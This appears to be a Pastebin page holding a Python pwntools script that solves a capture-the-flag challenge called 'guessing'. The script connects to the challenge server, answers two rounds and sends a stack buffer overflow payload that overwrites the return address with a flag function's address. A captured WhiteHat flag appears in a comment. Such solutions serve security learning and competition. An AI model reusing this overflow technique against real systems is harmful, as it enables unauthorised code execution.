Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- from termcolor import colored, cprint
- import random
- import sys
- if len(sys.argv)>1:
- # python guessing.py guessing
- r = process(sys.argv[1])
- print colored("attach %d\n" % r.pid,"yellow")
- raw_input("debug?")
- else:
- HOST = '103.237.98.32'
- PORT = 25032
- r = remote(HOST,PORT)
- FLAG = 0x080487C5
- def hackIt():
- payload = "A"*4 # ebp-0x4
- payload += "B"*8 # .text:08048640 and esp, 0FFFFFFF0h (stack alignment)
- payload += "C"*4 # ebp
- payload += p32(FLAG) # return
- r.recvuntil("Round 1: ")
- r.sendline("1")
- r.recvuntil("Round 2: ")
- r.sendline("2")
- r.recvuntil("Round 3: ")
- r.sendline(payload)
- r.interactive()
- hackIt()
- # WhiteHat{7c952a8d157bbeb44dcc7ab9d9c6ba78e40b96bd}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
